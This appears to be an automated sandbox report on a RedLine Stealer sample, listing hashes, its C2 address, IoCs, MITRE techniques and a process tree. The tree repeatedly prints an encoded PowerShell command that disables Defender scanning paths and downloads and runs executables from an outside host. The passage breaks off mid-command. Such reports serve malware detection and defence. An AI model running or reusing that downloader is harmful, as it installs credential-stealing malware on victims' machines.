redline | 95a32c06589042c29fc2879bc7e55866664628a0bf1a5180ec92f9b4c52c01cb

Analysis

max time kernel
150s
max time network
128s
platform
windows7_x64
resource
win7-20220414-en
submitted
07-06-2022 19:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

C4Loader.exe
Size

2.2MB
MD5

5e0b3c359fcc36dfa50f09642e628fd3
SHA1

88ca1402ca389c6fe41e13da53b27722f9dea253
SHA256

95a32c06589042c29fc2879bc7e55866664628a0bf1a5180ec92f9b4c52c01cb
SHA512

eaca6ef4448550d83b63ea4ca2f7c5817a23515e5f74d61eb0e79eafe9c0450d16854054dac2d777a16b19065d4e7d6aa47661715ca05c8646d7c8f63c795545

Score

10^/10

redline new1 discovery evasion exploit infostealer spyware suricata

Malware Config

Extracted

Family

redline

Botnet

new1

194.87.186.140:46703

Attributes

auth_value
1f11240703f5c67f15da5cf49122762c

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/103548-122-0x00000000004E0000-0x0000000000500000-memory.dmp	family_redline

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

4 42572 powershell.exe
6 42572 powershell.exe
8 42572 powershell.exe
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

MicroS.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts MicroS.exe

flow	pid	process
4	42572	powershell.exe
6	42572	powershell.exe
8	42572	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	MicroS.exe

Executes dropped EXE 11 IoCs

Processes:

new1.exeh163oPsdEB95.exeMicroS.exenew1.exeh163oPsdEB95.exeMicroS.exenew1.exeh163oPsdEB95.exeMicroS.exeupdater.exe

pid	process
42756	new1.exe
47764	h163oPsdEB95.exe
61824	MicroS.exe
1344
111448	new1.exe
111508	h163oPsdEB95.exe
111920	MicroS.exe
162084	new1.exe
162124	h163oPsdEB95.exe
162212	MicroS.exe
149424	updater.exe

Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

149212 takeown.exe
149240 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
149212	takeown.exe
149240	icacls.exe

Loads dropped DLL 29 IoCs

Processes:

powershell.exeWerFault.exepowershell.exepowershell.exeWerFault.exeWerFault.exetaskeng.exe

pid	process
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
105656	WerFault.exe
105656	WerFault.exe
105656	WerFault.exe
105656	WerFault.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161988	WerFault.exe
161988	WerFault.exe
161988	WerFault.exe
161988	WerFault.exe
113368	WerFault.exe
113368	WerFault.exe
113368	WerFault.exe
113368	WerFault.exe
161988	WerFault.exe
149364	taskeng.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

149212 takeown.exe
149240 icacls.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
149212	takeown.exe
149240	icacls.exe

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 5 IoCs

Processes:

C4Loader.exenew1.exeC4Loader.exeC4Loader.exenew1.exe

description	pid	process	target process
PID 1504 set thread context of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 42756 set thread context of 103548	42756	new1.exe	AppLaunch.exe
PID 47940 set thread context of 111520	47940	C4Loader.exe	AppLaunch.exe
PID 111544 set thread context of 161824	111544	C4Loader.exe	AppLaunch.exe
PID 162084 set thread context of 154736	162084	new1.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

MicroS.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	MicroS.exe
File created	C:\Program Files\Google\Chrome\updater.exe	MicroS.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

148608 sc.exe
148632 sc.exe
148676 sc.exe
148708 sc.exe
148756 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
148608	sc.exe
148632	sc.exe
148676	sc.exe
148708	sc.exe
148756	sc.exe

Program crash 6 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
42520	1504	WerFault.exe	C4Loader.exe
105656	42756	WerFault.exe	new1.exe
111564	47940	WerFault.exe	C4Loader.exe
161864	111544	WerFault.exe	C4Loader.exe
113368	162084	WerFault.exe	new1.exe
161988	162212	WerFault.exe	MicroS.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

148864 schtasks.exe
Modifies registry key 1 TTPs 5 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exe

pid process

148856 reg.exe
149044 reg.exe
149096 reg.exe
149128 reg.exe
149148 reg.exe

pid	process
148864	schtasks.exe

pid	process
148856	reg.exe
149044	reg.exe
149096	reg.exe
149128	reg.exe
149148	reg.exe

Suspicious behavior: EnumeratesProcesses 41 IoCs

Processes:

powershell.exepowershell.exepowershell.exeAppLaunch.exeAppLaunch.exepowershell.exeh163oPsdEB95.exeh163oPsdEB95.exeMicroS.exe

pid	process
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
42572	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
111604	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
161904	powershell.exe
103548	AppLaunch.exe
154736	AppLaunch.exe
162064	powershell.exe
47764	h163oPsdEB95.exe
47764	h163oPsdEB95.exe
47764	h163oPsdEB95.exe
47764	h163oPsdEB95.exe
47764	h163oPsdEB95.exe
111508	h163oPsdEB95.exe
111508	h163oPsdEB95.exe
111508	h163oPsdEB95.exe
111508	h163oPsdEB95.exe
111508	h163oPsdEB95.exe
111920	MicroS.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exeAppLaunch.exeAppLaunch.exepowershell.exeMicroS.exetakeown.exe

description	pid	process
Token: SeDebugPrivilege	42572	powershell.exe
Token: SeDebugPrivilege	111604	powershell.exe
Token: SeDebugPrivilege	161904	powershell.exe
Token: SeDebugPrivilege	103548	AppLaunch.exe
Token: SeDebugPrivilege	154736	AppLaunch.exe
Token: SeDebugPrivilege	162064	powershell.exe
Token: SeDebugPrivilege	111920	MicroS.exe
Token: SeTakeOwnershipPrivilege	149212	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

C4Loader.exeAppLaunch.exepowershell.exenew1.exeC4Loader.exe

description	pid	process	target process
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42476	1504	C4Loader.exe	AppLaunch.exe
PID 1504 wrote to memory of 42520	1504	C4Loader.exe	WerFault.exe
PID 1504 wrote to memory of 42520	1504	C4Loader.exe	WerFault.exe
PID 1504 wrote to memory of 42520	1504	C4Loader.exe	WerFault.exe
PID 1504 wrote to memory of 42520	1504	C4Loader.exe	WerFault.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42476 wrote to memory of 42572	42476	AppLaunch.exe	powershell.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 42756	42572	powershell.exe	new1.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47764	42572	powershell.exe	h163oPsdEB95.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 47940	42572	powershell.exe	C4Loader.exe
PID 42572 wrote to memory of 61824	42572	powershell.exe	MicroS.exe
PID 42572 wrote to memory of 61824	42572	powershell.exe	MicroS.exe
PID 42572 wrote to memory of 61824	42572	powershell.exe	MicroS.exe
PID 42572 wrote to memory of 61824	42572	powershell.exe	MicroS.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 103548	42756	new1.exe	AppLaunch.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 42756 wrote to memory of 105656	42756	new1.exe	WerFault.exe
PID 47940 wrote to memory of 111520	47940	C4Loader.exe	AppLaunch.exe
PID 47940 wrote to memory of 111520	47940	C4Loader.exe	AppLaunch.exe
PID 47940 wrote to memory of 111520	47940	C4Loader.exe	AppLaunch.exe

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1504

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:42476

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQB2AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQBmAHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBqAHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHcAbwB3AG8AdQBjAGgALgBuAGUAdAAvAG8AdQBjAGgALwBuAGUAdwAxAC4AZQB4AGUAJwAsACAAPAAjAGMAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBkAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeABiAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMQAuAGUAeABlACcAKQApADwAIwB2AGsAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwB3AG8AdwBvAHUAYwBoAC4AbgBlAHQALwBvAHUAYwBoAC8AaAAxADYAMwBvAFAAcwBkAEUAQgA5ADUALgBlAHgAZQAnACwAIAA8ACMAbQBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHUAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAGEAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBoADEANgAzAG8AUABzAGQARQBCADkANQAuAGUAeABlACcAKQApADwAIwBjAHkAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwB3AG8AdwBvAHUAYwBoAC4AbgBlAHQALwBvAHUAYwBoAC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHEAZABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBsAGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgB6AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHQAeQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHcAbwB3AG8AdQBjAGgALgBuAGUAdAAvAG8AdQBjAGgALwBNAGkAYwByAG8AUwAuAGUAeABlACcALAAgADwAIwB5AHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAcwB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAbgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AaQBjAHIAbwBTAC4AZQB4AGUAJwApACkAPAAjAGIAdABlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAYwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAxAC4AZQB4AGUAJwApADwAIwBsAG4AawAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGUAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBsAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAaAAxADYAMwBvAFAAcwBkAEUAQgA5ADUALgBlAHgAZQAnACkAPAAjAHMAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAcABnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHIAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAGkAagBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAeABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHgAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAGkAYwByAG8AUwAuAGUAeABlACcAKQA8ACMAagBhAGIAIwA+AA=="
3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:42572

C:\Users\Admin\AppData\Local\Temp\new1.exe
"C:\Users\Admin\AppData\Local\Temp\new1.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:42756

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:103548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 42756 -s 32688
5⤵
- Loads dropped DLL
- Program crash
PID:105656

C:\Users\Admin\AppData\Local\Temp\h163oPsdEB95.exe
"C:\Users\Admin\AppData\Local\Temp\h163oPsdEB95.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:47764

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
4⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:47940

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
5⤵
PID:111520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQB2AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQBmAHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBqAHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHcAbwB3AG8AdQBjAGgALgBuAGUAdAAvAG8AdQBjAGgALwBuAGUAdwAxAC4AZQB4AGUAJwAsACAAPAAjAGMAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBkAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeABiAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMQAuAGUAeABlACcAKQApADwAIwB2AGsAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwB3AG8AdwBvAHUAYwBoAC4AbgBlAHQALwBvAHUAYwBoAC8AaAAxADYAMwBvAFAAcwBkAEUAQgA5ADUALgBlAHgAZQAnACwAIAA8ACMAbQBnAGEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBzAHUAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBuAGEAegAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBoADEANgAzAG8AUABzAGQARQBCADkANQAuAGUAeABlACcAKQApADwAIwBjAHkAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwB3AG8AdwBvAHUAYwBoAC4AbgBlAHQALwBvAHUAYwBoAC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHEAZABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgBsAGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbgB6AHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHQAeQBzACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHcAbwB3AG8AdQBjAGgALgBuAGUAdAAvAG8AdQBjAGgALwBNAGkAYwByAG8AUwAuAGUAeABlACcALAAgADwAIwB5AHMAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGEAcwB4ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGcAbgBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAE0AaQBjAHIAbwBTAC4AZQB4AGUAJwApACkAPAAjAGIAdABlACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAYwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBtAHEAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBuAGUAdwAxAC4AZQB4AGUAJwApADwAIwBsAG4AawAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGUAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAegBsAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAaAAxADYAMwBvAFAAcwBkAEUAQgA5ADUALgBlAHgAZQAnACkAPAAjAHMAaQBzACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAGcAcABnACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AHIAaQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBDADQATABvAGEAZABlAHIALgBlAHgAZQAnACkAPAAjAGkAagBhACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHMAeABjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB4AHgAaAAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBNAGkAYwByAG8AUwAuAGUAeABlACcAKQA8ACMAagBhAGIAIwA+AA=="
6⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:111604

C:\Users\Admin\AppData\Local\Temp\new1.exe
"C:\Users\Admin\AppData\Local\Temp\new1.exe"
7⤵
- Executes dropped EXE
PID:111448

C:\Users\Admin\AppData\Local\Temp\h163oPsdEB95.exe
"C:\Users\Admin\AppData\Local\Temp\h163oPsdEB95.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:111508

C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
7⤵
- Suspicious use of SetThreadContext
PID:111544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
8⤵
PID:161824

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAaQBhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbQB2AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAZQBmAHYAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAeQBqAHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHcAbwB3AG8AdQBjAGgALgBuAGUAdAAvAG8AdQBjAGgALwBuAGUAdwAxAC4AZQB4AGUAJwAsACAAPAAjAGMAbQB0ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBkAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAeABiAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMQAuAGUAeABlACcAKQApADwAIwB2AGsAZgAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwB3AG8AdwBvAHUAYwBoA